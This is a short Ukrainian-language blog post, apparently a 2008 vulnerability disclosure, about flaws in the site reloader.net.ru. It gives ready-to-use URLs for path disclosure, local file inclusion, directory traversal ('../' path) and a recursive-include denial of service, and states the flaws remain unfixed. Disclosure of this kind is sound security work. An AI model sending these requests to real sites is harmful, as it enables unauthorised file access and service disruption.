Уразливості на reloader.net.ru
19:32 13.10.200824.04.2008
У жовтні, 03.10.2007, я знайшов Full path disclosure, Local File Include, Directory Traversal та Denial of Service уразливості на проекті http://reloader.net.ru. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
13.10.2008
Full path disclosure:
http://reloader.net.ru/index.php?path=download
Local File Include:
http://reloader.net.ru/index.php?path=download/index.php
Directory Traversal:
http://reloader.net.ru/index.php?path=../public_html/CSS/nav
DoS (Recursive File Include):
http://reloader.net.ru/index.php?path=index.php
Дані уразливості досі не виправлені.